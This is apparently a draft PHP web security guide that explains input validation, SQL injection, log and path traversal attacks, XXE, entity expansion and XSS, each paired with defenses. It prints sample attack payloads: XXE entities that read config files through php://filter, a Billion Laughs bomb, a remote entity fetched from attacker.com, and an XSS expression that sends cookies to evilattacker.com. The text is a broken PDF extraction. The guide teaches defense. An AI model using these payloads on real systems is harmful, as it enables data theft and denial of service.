PHP Security
PHP Security
Release 1.0a1
Padraic Brady
Contents
ii
Contents
Contents
CHAPTER 1
Introduction
will start to sweat at the very idea of a security vulnerability while others can quite literally argue
the definition of a security vulnerability to the point where they can confidently state it is not a
security vulnerability. In between may be programmers who do a lot of shoulder shrugging since
nothing has gone completely sideways on them before. Its a weird world out there.
Since the goal of web application security is to protect the users, ourselves and whoever else might
rely on the services that application provides, we need to understand a few basics:
1. Who wants to attack us?
2. How can they attack us?
3. What can we do to stop them?
Chapter 1. Introduction
somewhere. That conservative assumption holds because all web applications are built by Humans
- and Humans make mistakes. As a result, the concept of perfect security is a pipe dream. All
applications carry the risk of being vulnerable, so the job of programmers is to ensure that that risk
is minimised.
Mitigating the risk of suffering an attack on your web application requires a bit of thinking. As we
progress through this guide, Ill introduce possible ways of attacking a web application. Some will
be very obvious, some not. In all cases, the solution should take account of some basic security
principles.
Chapter 1. Introduction
damaging an attack could become. Perhaps, if the worst occured, you would be able to mitigate
some of the damage with a few extra defences and design changes? Perhaps that traditional solution
youve been using has been supplanted by an even better solution?
have not yet been spotted or rectified by the documentation maintainers. The same goes for Stackoverflow.
Dedicated sources of security wisdom (whether PHP oriented or not) are generally of a higher
quality. The closest thing to a Bible for PHP security is actually the OWASP website and the
articles, guides and cheatsheets it offers. If OWASP says not to do something, please - just dont
do it!
Chapter 1. Introduction
1.6 Conclusion
TBD
1.6. Conclusion
10
Chapter 1. Introduction
CHAPTER 2
Input Validation
Input Validation is the outer defensive perimeter for your web application. This perimeter protects the core business logic, processing and output generation. Beyond the perimeter is everything considered potential enemy territory which is...literally everything other than the literal code
executed by the current request. All possible entrances and exits on the perimeter are guarded
day and night by trigger happy sentries who prefer to shoot first and never ask questions. Connected to this perimeter are separately guarded (and very suspicious looking) allies including the
Model/Database and Filesystem. Nobody wants to shoot them but if they press their luck...pop.
Each of these allies have their own perimeters which may or may not trust ours.
Remember what I said about who to trust? As noted in the Introduction, we trust nothing and
nobody. The common phrase you will have seen in PHP is to never trust user input. This is
one of those compartmentalising by trust value issues I mentioned. In suggesting that users are
untrusted, we imply that everything else is trusted. This is untrue. Users are just the most obvious
untrusted source of input since they are known strangers over which we have no control.
11
The above example passes the filter without issue. The problem with accepting a php:// URL is that
it can be passed to PHP functions which expect to retrieve a remote HTTP URL and not to return
data from executing PHP (via the PHP wrapper). The flaw in the above is that the filter options
have no method of limiting the URI scheme allowed and users expect this to be one of http, https
or mailto rather than some generic PHP specific URI. This is the sort of generic validation approach
we should seek to avoid at all costs.
12
In the above example, naive filtering for a specific tag would achieve nothing since removing the
obvious <script> tag actually ensures that the remaining text is now a completely valid HTML
script element. The same principle applies to the filtering of any specific format and it underlines
also why Input Validation isnt the end of your applications defenses.
Rather than attempting to fix input, you should just apply a relevant whitelist validator and reject
such inputs - denying them any entry into the web application. Where you must filter, always filter
before validation and never after.
13
HTML forms are able to impose constraints on the input used to complete the form. You can restrict
choices using a option list, restrict a value using a mininum and maximum allowed number, and
set a maximum length for text. HTML5 is even more expressive. Browsers will validate urls and
emails, can limit input on date, number and range fields (support for both is sketchy though), and
inputs can be validated using a Javascript regular expression included in the pattern attribute.
With all of these controls, its important to remember that they are intended to make the user
experience more consistent. Any attacker can create a custom form that doesnt include any of the
constraints in your original form markup. They can even just use a programmed HTTP client to
automate form submissions!
Another example of external validation controls may be the constraints applied to the response
schema of third-party APIs such as Twitter. Twitter is a huge name and its tempting to trust
them without question. However, since were paranoid, we really shouldnt. If Twitter were ever
compromised, their responses may contain unsafe data we did not expect so we really do need to
apply our own validation to defend against such a disaster.
Where we are aware of the external validation controls in place, we may, however, monitor them
for breaches. For example, if a HTML form imposes a maxlength attribute but we receive input that
exceeds that lenght, it may be wise to consider this as an attempted bypass of validation controls
by a user. Using such methods, we could log breaches and take further action to discourage a
potential attacker through access denial or request rate limiting.
14
When designing validators, be sure to prefer strict comparisons and use manual type conversion
where input or output values might be strings. Web forms, as an example, always return string data
so to work with a resulting expected integer from a form you would have to verify its type:
1
2
3
4
5
6
7
8
9
10
If you take the second approach, any string which starts with an integer that falls within the expected range would pass validation.
assert(checkIntegerRange(6 OR 1=1, 5, 10)); //issues NULL/Warning correctly assert(checkIntegerRangeTheWrongWay(6 OR 1=1, 5, 10)); //returns TRUE incorrectly
Type casting naughtiness abounds in many operations and functions such as in_array() which is
often used to check if a value exists in an array of valid options.
15
16
17
encryption of the data they will be exchanging. Encryption by itself is useless in this case because
we never challenged the MITM server to prove it was the actual server we wanted to contact. That
is why Step 2, while technically optional, is actually completely necessary. The web application
MUST verify the identity of the server it contacted in order to defend against MITM attacks.
Due to a widespread perception that encryption prevents MITM attacks, many applications and
libraries do not apply Step 2. Its both a common and easily detected vulnerability in open source
software. PHP itself, due to reasons beyond the understanding of mere mortals, disables server
verification by default for its own HTTPS wrapper when using stream_socket_client(), fsockopen()
or other internal functions. For example:
1
$body = file_get_contents(https://api.example.com/search?q=sphinx);
The above suffers from an obvious MITM vulnerability and any data resulting from such a HTTPS
request can never be considered as representing a response from the intended service. This request
should have been made by enabling server verification as follows:
1
2
Returning to sanity, the cURL extension does enable server verification out of the box so no option
setting is required. However, programmers may demonstrate the following crazy approach to
securing their libraries and applications. This one is easy to search for in any libraries your web
application will depend on.
curl_setopt(CURLOPT_SSL_VERIFYPEER, false);
Disabling peer verification in either PHPs SSL context or with curl_setopt() will enable a MITM
vulnerability but its commonly allowed to deal with annoying errors - the sort of errors that may
indicate an MITM attack or that the application is attempting to communicate with a host whose
SSL certificate is misconfigured or expired.
Web applications can often behave as a proxy for user actions, e.g. acting as a Twitter Client. The
least we can do is hold our applications to the high standards set by browsers who will warn their
users and do everything possible to prevent users from reaching suspect servers.
2.4 Conclusion
TBD
18
CHAPTER 3
Injection Attacks
The OWASP Top 10 lists Injection and Cross-Site Scripting (XSS) as the most common security
risks to web applications. Indeed, they go hand in hand because XSS attacks are contingent on a
successful Injection attack. While this is the most obvious partnership, Injection is not just limited
to enabling XSS.
Injection is an entire class of attacks that rely on injecting data into a web application in order to
facilitate the execution or interpretation of malicious data in an unexpected manner. Examples of
attacks within this class include Cross-Site Scripting (XSS), SQL Injection, Header Injection, Log
Injection and Full Path Disclosure. Im scratching the surface here.
This class of attacks is every programmers bogeyman. They are the most common and successful attacks on the internet due to their numerous types, large attack surface, and the complexity
sometimes needed to protect against them. All applications need data from somewhere in order to
function. Cross-Site Scripting and UI Redress are, in particular, so common that Ive dedicated the
next chapter to them and these are usually categorised separately from Injection Attacks as their
own class given their significance.
OWASP uses the following definition for Injection Attacks:
Injection flaws, such as SQL, OS, and LDAP injection, occur when untrusted data is sent to an
interpreter as part of a command or query. The attackers hostile data can trick the interpreter into
executing unintended commands or accessing unauthorized data.
the data comes from another source including the database itself. Programmers will often trust
data from their own database believing it to be completely safe without realising that being safe for
one particular usage does not mean it is safe for all other subsequent usages. Data from a database
should be treated as untrusted unless proven otherwise, e.g. through validation processes.
If successful, an SQL Injection can manipulate the SQL query being targeted to perform a database
operation not intended by the programmer.
Consider the following query:
$db = new mysqli(localhost, username, password, storedb);
$result = $db->query(
SELECT * FROM transactions WHERE user_id = . $_POST[user_id]
);
The above has a number of things wrong with it. First of all, we havent validated the contents
of the POST data to ensure it is a valid user_id. Secondly, we are allowing an untrusted source to
tell us which user_id to use - an attacker could set any valid user_id they wanted to. Perhaps the
user_id was contained in a hidden form field that we believed safe because the web form would
not let it be edited (forgetting that attackers can submit anything). Thirdly, we have not escaped
the user_id or passed it to the query as a bound parameter which also allows the attacker to inject
arbitrary strings that can manipulate the SQL query given we failed to validate it in the first place.
The above three failings are remarkably common in web applications.
As to trusting data from the database, imagine that we searched for transactions using a user_name
field. Names are reasonably broad in scope and may include quotes. Its conceivable that an
attacker could store an SQL Injection string inside a user name. When we reuse that string in a
later query, it would then manipulate the query string if we considered the database a trusted source
of data and failed to properly escape or bind it.
Another factor of SQL Injection to pay attention to is that persistent storage need not always occurs
on the server. HTML5 supports the use of client side databases which can be queried using SQL
with the assistance of Javascript. There are two APIs facilitating this: WebSQL and IndexedDB.
WebSQL was deprecated by the W3C in 2010 and is supported by WebKit browsers using SQLite
in the backend. Its support in WebKit will likely continue for backwards compatibility purposes
even though it is no longer recommended for use. As its name suggests, it accepts SQL queries an
may therefore be susceptible to SQL Injection attacks. IndexedDB is the newer alternative but is a
NOSQL database (i.e. does not require usage of SQL queries).
21
or query parts without enforcing parameter binding. Otherwise you should just avoid the need to
escape altogether. Its messy, error-prone and differs by database extension.
Parameterised Queries (Prepared Statements)
Parameterisation or Parameter Binding is the recommended way to construct SQL queries and all
good database libraries will use this by default. Here is an example using PHPs PDO extension.
if(ctype_digit($_POST[id]) && is_int($_POST[id])) {
$validatedId = $_POST[id];
$pdo = new PDO(mysql:store.db);
$stmt = $pdo->prepare(SELECT * FROM transactions WHERE user_id = :id);
$stmt->bindParam(:id, $validatedId, PDO::PARAM_INT);
$stmt->execute();
} else {
// reject id value and report error to user
}
The bindParam() method available for PDO statements allows you to bind parameters to the
placeholders present in the prepared statement and accepts a basic datatype parameter such
as PDO::PARAM_INT, PDO::PARAM_BOOL, PDO::PARAM_LOB and PDO::PARAM_STR.
This defaults to PDO::PARAM_STR if not given so remember it for other values!
Unlike manual escaping, parameter binding in this fashion (or any other method used by your
database library) will correctly escape the data being bound automatically so you dont need to recall which escaping function to use. Using parameter binding consistently is also far more reliable
than remembering to manually escape everything.
Enforce Least Privilege Principle
Putting the breaks on a successful SQL Injection is just as important as preventing it from occuring
in the first place. Once an attacker gains the ability to execute SQL queries, they will be doing so
as a specific database user. The principle of Least Privilege can be enforced by ensuring that all
database users are given only those privileges which are absolutely necessary for them in order to
complete their intended tasks.
If a database user has significant privileges, an attacker may be able to drop tables and manipulate
the privileges of other users under which the attacker can perform other SQL Injections. You
should never access the database from a web application as the root or any other highly privileged
or administrator level user so as to ensure this can never happen.
Another variant of the Least Privilege principle is to separate the roles of reading and writing data
to a database. You would have a user with sufficient privileges to perform writes and another
separate user restricted to a read-only role. This degree of task separation ensures that if an SQL
Injection targets a read-only user, the attacker cannot write or manipulate table data. This form of
22
compartmentalisation can be extended to limit access even further and so minimise the impact of
successful SQL Injection attacks.
Many web applications, particularly open source applications, are specifically designed to use
one single database user and that user is almost certainly never checked to see if they are highly
privileged or not. Bear the above in mind and dont be tempted to run such applications under an
administrative user.
23
accessible to the PHP process. The above functions will also accept a URL in PHPs default
configuration unless XXX is disabled.
Evaluation
PHPs eval() function accepts a string of PHP code to be executed.
Regular Expression Injection
The PCRE function preg_replace() function in PHP allows for an e (PREG_REPLACE_EVAL)
modifier which means the replacement string will be evaluated as PHP after subsitution. Untrusted
input used in the replacement string could therefore inject PHP code to be executed.
Flawed File Inclusion Logic
Web applications, by definition, will include various files necessary to service any given request.
By manipulating the request path or its parameters, it may be possible to provoke the server into
including unintended local files by taking advantage of flawed logic in its routing, dependency
management, autoloading or other processes.
Such manipulations outside of what the web application was designed to handle can have unforeseen effects. For example, an application might unwittingly expose routes intended only for command line usage. The application may also expose other classes whose constructors perform tasks
(not a recommended way to design classes but it happens). Either of these scenarios could interfere
with the applications backend operations leading to data manipulation or a potential for Denial Of
Service (DOS) attacks on resource intensive operations not intended to be directly accessible.
Server Misconfiguration
24
What if the attacker used a username of the form AdminnSuccessful login by Adminn?
If this string, from untrusted input were inserted into the log the attacker would have successfully
disguised their failed login attempt as an innocent failure by the Admin user to login. Adding a
successful retry attempt makes the data even less suspicious.
Of course, the point here is that an attacker can append all manner of log entries. They can also
inject XSS vectors, and even inject characters to mess with the display of the log entries in a
console.
25
More nefarious attacks using Log Injection may attempt to build on a Directory Traversal attack to
display a log in a browser. In the right circumstances, injecting PHP code into a log message and
calling up the log file in the browser can lead to a successful means of Code Injection which can
be carefully formatted and executed at will by the attacker. Enough said there. If an attacker can
execute PHP on the server, its game over and time to hope you have sufficient Defense In Depth
to minimise the damage.
include(), require(), file_get_contents() or even less suspicious (for some people) functions such as DOMDocument::load().
The Dot-Dot-Slash sequence allows an attacker to tell the system to navigate or backtrack up to
the parent directory. Thus a path such as /var/www/public/../vendor actually points to
/var/www/public/vendor. The Dot-Dot-Slash sequence after /public backtracks to that
directorys parent, i.e. /var/www. As this simple example illustrates, an attacker can use this to
access files which lie outside of the /public directory that is accessible from the webserver.
Of course, path traversals are not just for backtracking. An attacker can also inject new path
elements to access child directories which may be inaccessible from a browser, e.g. due to a deny
from all directive in a .htaccess in the child directory or one of its parents. Filesystem
operations from PHP dont care about how Apache or any other webserver is configured to control
access to non-public files and directories.
27
an optional DOCTYPE and the expanded value they represent may reference an external resource
to be included. It is this capacity of ordinary XML to carry custom references which can be
expanded with the contents of an external resources that gives rise to an XXE vulnerability. Under
normal circumstances, untrusted inputs should never be capable of interacting with our system in
unanticipated ways and XXE is almost certainly unexpected for most programmers making it an
area of particular concern.
For example, lets define a new custom entity called harmless:
<!DOCTYPE results [ <!ENTITY harmless "completely harmless"> ]>
An XML document with this entity definition can now refer to the &harmless; entity anywhere
where entities are allowed:
<?xml version="1.0"?>
<!DOCTYPE results [<!ENTITY harmless "completely harmless">]>
<results>
<result>This result is &harmless;</result>
</results>
An XML parser such as PHP DOM, when interpreting this XML, will process this custom entity
as soon as the document loads so that requesting the relevant text will return the following:
This result is completely harmless
Custom entities obviously have a benefit in representing repetitive text and XML with shorter
named entities. Its actually not that uncommon where the XML must follow a particular grammar
and where custom entities make editing simpler. However, in keeping with our theme of not
trusting outside inputs, we need to be very careful as to what all the XML our application is
consuming is really up to. For example, this one is definitely not of the harmless variety:
<?xml version="1.0"?>
<!DOCTYPE results [<!ENTITY harmless SYSTEM "file:///var/www/config.ini">]>
<results>
<result>&harmless;</result>
</results>
Depending on the contents of the requested local file, the content could be used when expanding the
&harmless; entity and the expanded content could then be extracted from the XML parser and
included in the web applications output for an attacker to examine, i.e. giving rise to Information
Disclosure. The file retrieved will be interpreted as XML unless it avoids the special characters that
trigger that interpretation thus making the scope of local file content disclosure limited. If the file
is intepreted as XML but does not contain valid XML, an error will be the likely result preventing
disclosure of the contents. PHP, however, has a neat trick available to bypass this scope limitation
and remote HTTP requests can still, obviously, have an impact on the web application even if the
returned response cannot be communicated back to the attacker.
PHP offers three frequently used methods of parsing and consuming XML: PHP DOM,
SimpleXML and XMLReader. All three of these use the libxml2 extension and external entity
28
support is enabled by default. As a consequence, PHP has a by-default vulnerability to XXE which
makes it extremely easy to miss when considering the security of a web application or an XML
consuming library.
You should also remember that XHTML and HTML5 may both be serialised as valid XML which
may mean that some XHTML pages or XML-serialised HTML5 could be parsed as XML, e.g. by
using DOMDocument::loadXML() instead of DOMDocument::loadHTML(). Such uses of
an XML parser are also vulnerable to XML External Entity Injection. Remember that libxml2
does not currently even recognise the HTML5 DOCTYPE and so cannot validate it as it would for
XHTML DOCTYPES.
Examples of XML External Entity Injection
File Content And Information Disclosure
We previously met an example of Information Disclosure by noting that a custom entity in XML
could reference an external file.
<?xml version="1.0"?>
<!DOCTYPE results [<!ENTITY harmless SYSTEM "file:///var/www/config.ini">]>
<results>
<result>&harmless;</result>
</results>
This would expand the custom &harmless; entity with the file contents. Since all such requests
are done locally, it allows for disclosing the contents of all files that the application has read access
to. This would allow attackers to examine files that are not publicly available should the expanded
entity be included in the output of the application. The file contents that can be disclosed in this are
significantly limited - they must be either XML themselves or a format which wont cause XML
parsing to generate errors. This restriction can, however, be completely ignored in PHP:
<?xml version="1.0"?>
<!DOCTYPE results [
<!ENTITY harmless SYSTEM
"php://filter/read=convert.base64-encode/resource=/var/www/config.ini"
>
]>
<results>
<result>&harmless;</result>
</results>
PHP allows access to a PHP wrapper in URI form as one of the protocols accepted by common
filesystem functions such as file_get_contents(), require(), require_once(),
file(), copy() and many more. The PHP wrapper supports a number of filters which can
be run against a given resource so that the results are returned from the function call. In the above
case, we use the convert.base-64-encode filter on the target file we want to read.
3.6. XML Injection
29
What this means is that an attacker, via an XXE vulnerability, can read any accessible file in PHP
regardless of its textual format. All the attacker needs to do is base64 decode the output they
receive from the application and they can dissect the contents of a wide range of non-public files
with impunity. While this is not itself directly causing harm to end users or the applications
backend, it will allow attackers to learn quite a lot about the application they are attempting to
map which may allow them to discover other vulnerabilities with a minimum of effort and risk of
discovery.
Bypassing Access Controls
Access Controls can be dictated in any number of ways. Since XXE attacks are mounted on the
backend to a web application, it will not be possible to use the current users session to any effect
but an attacker can still bypass backend access controls by virtue of making requests from the local
server. Consider the following primitive access control:
if (isset($_SERVER[HTTP_CLIENT_IP])
|| isset($_SERVER[HTTP_X_FORWARDED_FOR])
|| !in_array(@$_SERVER[REMOTE_ADDR], array(
127.0.0.1,
::1,
))
) {
header(HTTP/1.0 403 Forbidden);
exit(
You are not allowed to access this file.
);
}
This snippet of PHP and countless others like it are used to restrict access to certain PHP files to
the local server, i.e. localhost. However, an XXE vulnerability in the frontend to the application
actually gives an attacker the exact credentials needed to bypass this access control since all HTTP
requests by the XML parser will be made from localhost.
<?xml version="1.0"?>
<!DOCTYPE results [
<!ENTITY harmless SYSTEM
"php://filter/read=convert.base64-encode/resource=http://example.com/viewlog.ph
>
]>
<results>
<result>&harmless;</result>
</results>
If log viewing were restricted to local requests, then the attacker may be able to successfully grab
the logs anyway. The same thinking applies to maintenance or administration interfaces whose
access is restricted in this fashion.
30
Almost anything that can dictate how server resources are utilised could feasibly be used to generate a DOS attack. With XML External Entity Injection, an attacker has access to make arbitrary
HTTP requests which can be used to exhaust server resources under the right conditions.
See below also for other potential DOS uses of XXE attacks in terms of XML Entity Expansions.
Defenses against XML External Entity Injection
Considering the very attractive benefits of this attack, it might be surprising that the defense is extremely simple. Since DOM, SimpleXML, and XMLReader all rely on libxml2, we can simply
use the libxml_disable_entity_loader() function to disable external entity resolution.
This does not disable custom entities which are predefined in a DOCTYPE since these do not make
use of external resources which require a file system operation or HTTP request.
$oldValue = libxml_disable_entity_loader(true);
$dom = new DOMDocument();
$dom->loadXML($xml);
libxml_disable_entity_loader($oldValue);
You would need to do this for all operations which involve loading XML from a string, file or
remote URI.
Where external entities are never required by the application or for the majority of its requests,
you can simply disable external resource loading altogether on a more global basis which, in most
cases, will be far more preferable to locating all instances of XML loading, bearing in mind many
libraries are probably written with innate XXE vulnerabilities present:
libxml_disable_entity_loader(true);
Just remember to reset this once again to TRUE after any temporary enabling of external resource
loading. An example of a process which requires external entities in an innocent fashion is rendering Docbook XML into HTML where the XSL styling is dependent on external entities.
This libxml2 function is not, by an means, a silver bullet. Other extensions and PHP libraries
which parse or otherwise handle XML will need to be assessed to locate their off switch for
external entity resolution.
In the event that the above type of behaviour switching is not possible, you can alternatively check
if an XML document declares a DOCTYPE. If it does, and external entities are not allowed, you can
then simply discard the XML document, denying the untrusted XML access to a potentially vulnerable parser, and log it as a probable attack. If you log attacks this will be a necessary step since
there be no other errors or exceptions to catch the attempt. This check should be built into your
normal Input Validation routines. However, this is far from ideal and its strongly recommended to
fix the external entity problem at its source.
31
/**
* Attempt a quickie detection
*/
$collapsedXML = preg_replace("/[:space:]/", , $xml);
if(preg_match("/<!DOCTYPE/i", $collapsedXml)) {
throw new \InvalidArgumentException(
Invalid XML: Detected use of illegal DOCTYPE
);
}
It is also worth considering that its preferable to simply discard data that we suspect is the result of
an attack rather than continuing to process it further. Why continue to engage with something that
shows all the signs of being dangerous? Therefore, merging both steps from above has the benefit
of proactively ignoring obviously bad data while still protecting you in the event that discarding
data is beyond your control (e.g. 3rd-party libraries). Discarding the data entirely becomes far
more compelling for another reason stated earlier - libxml_disable_entity_loader()
does not disable custom entities entirely, only those which reference external resources. This can
still enable a related Injection attack called XML Entity Expansion which we will meet next.
Also known as a Quadratic Blowup Attack, a generic entity expansion attack, a custom entity is
defined as an extremely long string. When the entity is used numerous times throughout the document, the entity is expanded each time leading to an XML structure which requires significantly
more RAM than the original XML size would suggest.
32
<?xml version="1.0"?>
<!DOCTYPE results [<!ENTITY long "SOME_SUPER_LONG_STRING">]>
<results>
<result>Now include &long; lots of times to expand
the in-memory size of this XML structure</result>
<result>&long;&long;&long;&long;&long;&long;&long;
&long;&long;&long;&long;&long;&long;&long;&long;
&long;&long;&long;&long;&long;&long;&long;&long;
&long;&long;&long;&long;&long;&long;&long;&long;
Keep it going...
&long;&long;&long;&long;&long;&long;&long;...</result>
</results>
By balancing the size of the custom entity string and the number of uses of the entity within the
body of the document, its possible to create an XML file or string which will be expanded to use
up a predictable amount of server RAM. By occupying the servers RAM with repetitive requests
of this nature, it would be possible to mount a successful Denial Of Service attack. The downside
of the approach is that the initial XML must itself be quite large since the memory consumption is
based on a simple multiplier effect.
Recursive Entity Expansion
Where generic entity expansion requires a large XML input, recursive entity expansion packs more
punch per byte of input size. It relies on the XML parser to exponentially resolve sets of small
entities in such a way that their exponential nature explodes from a much smaller XML input size
into something substantially larger. Its quite fitting that this approach is also commonly called an
XML Bomb or Billion Laughs Attack.
<?xml version="1.0"?>
<!DOCTYPE results [
<!ENTITY x0 "BOOM!">
<!ENTITY x1 "&x0;&x0;">
<!ENTITY x2 "&x1;&x1;">
<!ENTITY x3 "&x2;&x2;">
<!-- Add the remaining sequence from x4...x100 (or boom) -->
<!ENTITY x99 "&x98;&x98;">
<!ENTITY boom "&x99;&x99;">
]>
<results>
<result>Explode in 3...2...1...&boom;</result>
</results>
The XML Bomb approach doesnt require a large XML size which might be restricted by the
application. Its exponential resolving of the entities results in a final text expansion that is 2^100
times the size of the &x0; entity value. Thats quite a large and devastating BOOM!
33
Both normal and recursive entity expansion attacks rely on locally defined entities in the XMLs
DTD but an attacker can also define the entities externally. This obviously requires that the XML
parser is capable of making remote HTTP requests which, as we met earlier in describing XML
External Entity Injection (XXE), should be disabled for your XML parser as a basic security measure. As a result, defending against XXEs defends against this form of XML Entity Expansion
attack.
Nevertheless, the way remote entity expansion works is by leading the XML parser into making
remote HTTP requests to fetch the expanded value of the referenced entities. The results will
then themselves define other external entities that the XML parser must additionally make HTTP
requests for. In this way, a couple of innocent looking requests can rapidly spiral out of control
adding strain to the servers available resources with the final result perhaps itself encompassing a
recursive entity expansion just to make matters worse.
<?xml version="1.0"?>
<!DOCTYPE results [
<!ENTITY cascade SYSTEM "http://attacker.com/entity1.xml">
]>
<results>
<result>3..2..1...&cascade<result>
</results>
The above also enables a more devious approach to executing a DOS attack should the remote
requests be tailored to target the local application or any other application sharing its server resources. This can lead to a self-inflicted DOS attack where attempts to resolve external entities by
the XML parser may trigger numerous requests to locally hosted applications thus consuming an
even greater propostion of server resources. This method can therefore be used to amplify the impact of our earlier discussion about using XML External Entity Injection (XXE) attacks to perform
a DOS attack.
Defenses Against XML Entity Expansion
The obvious defenses here are inherited from our defenses for ordinary XML External Entity
(XXE) attacks. We should disable the resolution of custom entities in XML to local files and
remote HTTP requests by using the following function which globally applies to all PHP XML
extensions that internally use libxml2.
libxml_disable_entity_loader(true);
PHP does, however, have the quirky reputation of not implementing an obvious means
of completely disabling the definition of custom entities using an XML DTD via the
DOCTYPE. PHP does define a LIBXML_NOENT constant and there also exists public property
DOMDocument::$substituteEntities but neither if used has any ameliorating effect. It
appears were stuck with using a makeshift set of workarounds instead.
34
Nevertheless, libxml2 does has a built in default intolerance for recursive entity resolution which
will light up your error log like a Christmas tree. As such, theres no particular need to implement
a specific defense against recursive entities though we should do something anyway on the off
chance libxml2 suffers a relapse.
The primary new danger therefore is the inelegent approach of the Quadratic Blowup Attack or
Generic Entity Expansion. This attack requires no remote or local system calls and does not
require entity recursion. In fact, the only defense is to either discard XML or sanitise XML
where it contains a DOCTYPE. Discarding the XML is the safest bet unless use of a DOCTYPE
is both expected and we received it from a secured trusted source, i.e. we received it over
a peer-verified HTTPS connection. Otherwise we need to create some homebrewed logic in
the absence of PHP giving us a working option to disable DTDs. Assuming you can called
libxml_disable_entity_loader(TRUE), the following will work safely since entity expansion is deferred until the node value infected by the expansion is accessed (which does not
happen during this check).
$dom = new DOMDocument;
$dom->loadXML($xml);
foreach ($dom->childNodes as $child) {
if ($child->nodeType === XML_DOCUMENT_TYPE_NODE) {
throw new \InvalidArgumentException(
Invalid XML: Detected use of illegal DOCTYPE
);
}
}
35
36
CHAPTER 4
Cross-Site Scripting (XSS) is probably the most common singular security vulnerability existing in
web applications at large. It has been estimated that approximately 65% of websites are vulnerable
to an XSS attack in some form, a statistic which should scare you as much as it does me.
We can extend this even further to the Javascript environment a web application introduces within
the browser. Client side Javascript can range from the very simple to the extremely complex, often
becoming client side applications in their own right. These client side applications must be secured
like any application, distrusting data received from remote sources (including the server-hosted
web application itself), applying input validation, and ensuring output to the DOM is correctly
escaped or sanitised.
Injected Javascript can be used to accomplish quite a lot: stealing cookie and session information,
performing HTTP requests with the users session, redirecting users to hostile websites, accessing
and manipulating client-side persistent storage, performing complex calculations and returning
results to an attackers server, attacking the browser or installing malware, leveraging control of
the user interface via the DOM to perform a UI Redress (aka Clickjacking) attack, rewriting or
manipulating in-browser applications, attacking browser extensions, and the list goes on...possibly
forever.
By some miracle, the forum software includes this signature as-is in all those spammed topics for
all the forum users to load into their browsers. The results should be obvious from the Javascript
code. The attacker is injecting an iframe into the page which will appear as a teeny tiny dot (zero
sized) at the very bottom of the page attracting no notice from anyone. The browser will send the
38
request for the iframe content which passes each users cookie value as a GET parameter to the
attackers URI where they can be collated and used in further attacks. While typical users arent
that much of a target for an attacker, a well designed trolling topic will no doubt attract a moderator
or administrator whose cookie may be very valuable in gaining access to the forums moderation
functions.
This is a simple example but feel free to extend it. Perhaps the attacker would like to know the
username associated with this cookie? Easy! Add more Javascript to query the DOM and grab
it from the current web page to include in a username= GET parameter to the attackers URL.
Perhaps they also need information about your browser to handle a Fingerprint defense of the
session too? Just include the value from navigator.userAgent.
This simple attack has a lot of repercussions including potentially gaining control over the forum as
an administrator. Its for this reason that underestimating the potential of XSS attack is ill advised.
Of course, being a simple example, there is one flaw with the attackers approach. Similar to examples using Javascripts alert() function Ive presented something which has an obvious defense.
All cookies containing sensitive data should be tagged with the HttpOnly flag which prevents
Javascript from accessing the cookie data. The principle you should remember, however, is that if
the attacker can inject Javascript, they can probably inject all conceivable Javascript. If they cant
access the cookie and mount an attack using it directly, they will do what all good programmers
would do: write an efficient automated attack.
<script>
var params = type=topic&action=delete&id=347;
var http = new XMLHttpRequest();
http.open(POST, forum.com/admin_control.php, true);
http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http.setRequestHeader("Content-length", params.length);
http.setRequestHeader("Connection", "close");
http.onreadystatechange = function() {
if(http.readyState == 4 && http.status == 200) {
// Do something else.
}
};
http.send(params);
</script>
The above is one possible use of Javascript to execute a POST request to delete a topic. We
could encapsulate this in a check to only run for a moderator, i.e. if the users name is displayed
somewhere we can match it against a list of known moderators or detect any special styling applied
to a moderators displayed name in the absence of a known list.
As the above suggests, HttpOnly cookies are of limited use in defending against XSS. They block
the logging of cookies by an attacker but do not actually prevent their use during an XSS attack.
Furthermore, an attacker would prefer not to leave bread crumbs in the visible markup to arouse
suspicion unless they actually want to be detected.
Next time you see an example using the Javascript alert() function, substitute it with a XML4.2. A Cross-Site Scripting Example
39
In the above, $colour is populated from a database of user preferances which influence the background colour used for a block of text. The value is injected into a CSS Context which is a child
of a HTML Attribute Context, i.e. were sticking some CSS into a style attribute. It may seem
unimportant to get so hooked up on Context but consider this:
$colour = "expression(document.write(<iframe src="
.= "http://evilattacker.com?cookie= + document.cookie.escape() + "
.= " height=0 width=0 />))";
<div style="background:<?php echo $colour ?>;">
If an attacker can successfully inject that colour, they can inject a CSS expression which will
execute the contained Javascript under Internet Explorer. In other words, the attacker was able to
switch out of the current CSS Context by injecting a new Javascript Context.
Now, I was very careless with the above example because I know some readers will be desperate
to get to the point of using escaping. So lets do that now.
$colour = "expression(document.write(<iframe src="
.= "http://evilattacker.com?cookie= + document.cookie.escape() + "
.= " height=0 width=0 />))";
If you checked this with Internet Explorer, youd quickly realise something is seriously wrong.
After using htmlspecialchars() to escape $colour, the XSS attack is still working!
This is the importance of understanding Context correctly. Each Context requires a different
method of escaping because each Context has different special characters and different escaping needs. You cannot just throw htmlspecialchars() and htmlentities() at everything and pray that
your web application is safe.
What went wrong in the above is that the browser will always unesape HTML Attributes before interpreting the context. We ignored the fact there were TWO Contexts to escape for. The unescaped
HTML Attribute data is the exact same CSS as the unescaped example would have rendered anyway.
What we should have done was CSS escaped the $colour variable and only then HTML escaped it.
This would have ensured that the $colour value was converted into a properly escaped CSS literal
string by escaping the brackets, quotes, spaces, and other characters which allowed the expression()
to be injected. By not recognising that our attribute encompassed two Contexts, we escaped it as
if it was only one: a HTML Attribute. A common mistake to make.
41
The lesson here is that Context matters. In an XSS attack, the attacker will always try to jump out
of the current Context into another one where Javascript can be executed. If you can identify all
the Contexts in your HTML output, bearing in mind their nestable nature, then youre ten steps
closer to successfully defending your web application from Cross-Site Scripting.
Lets take another quick example:
<a href="http://www.example.com">Example.com</a>
Omitting untrusted input for the moment, the above can be dissected as follows:
1. There is a URL Context, i.e. the value of the href attribute.
2. There is a HTML Attribute Context, i.e. it parents the URL Context.
3. There is a HTML Body Context. i.e. the text between the <a> tags.
Thats three different Contexts implying that up to three different escaping strategies would be
required if the data was determined by untrusted data. Well look at escaping as a defense against
XSS in far more detail in the next section.
Each of the above locations are dangerous. Allowing data within script tags, outside of literal
strings and numbers, would let an attack inject Javascript code. Data injected into HTML comments might be used to trigger Internet Explorer conditionals and other unanticipated results. The
4.5. Defending Against Cross-Site Scripting Attacks
43
next two are more obvious as we would never want an attacker to be able to influence tag or
